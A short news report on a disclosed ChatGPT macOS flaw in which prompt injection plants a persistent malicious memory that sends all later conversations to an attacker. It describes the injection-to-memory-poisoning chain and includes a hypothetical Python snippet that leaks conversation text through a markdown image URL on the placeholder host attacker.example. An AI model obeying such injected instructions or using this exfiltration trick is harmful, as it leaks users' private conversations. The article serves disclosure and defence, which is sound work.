Hacker creates fake memories in ChatGPT to steal victim data – but it may not be as bad as it sounds

Security researchers have disclosed a vulnerability that could allow attackers to plant malicious instructions in a user's memory settings in the ChatGPT macOS app.

A report by Johann Rehberger at Embrace the Red described how an attacker could use a prompt injection to take control of ChatGPT and then plant a malicious memory in its long-term storage, which persists across sessions. Because the poisoned memory is reloaded with every new chat, both sides of all subsequent conversations are exfiltrated directly to the attacker's server.
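Rehberger's demonstration relied on ChatGPT rendering markdown images whose URLs carry the stolen text, so that simply displaying a response sends the data off-device. Below is a minimal, hypothetical sketch of that exfiltration step; the attacker host and function names are illustrative and do not come from the report:

```python
# Hypothetical sketch: a poisoned "memory" instructs the model to append an
# invisible markdown image to each reply, leaking the conversation in the URL.
from urllib.parse import quote

ATTACKER_HOST = "https://attacker.example/log"  # placeholder, not from the report

def exfil_markdown(conversation_turn: str) -> str:
    # URL-encode the latest exchange into the image URL, so merely rendering
    # the markdown triggers an HTTP request to the attacker's server.
    return f"![.]({ATTACKER_HOST}?q={quote(conversation_turn)})"

print(exfil_markdown("user: here is my account number ..."))
```

Because the instruction lives in memory rather than in a single chat, deleting the conversation does not remove it; the leak continues until the memory itself is reviewed and deleted.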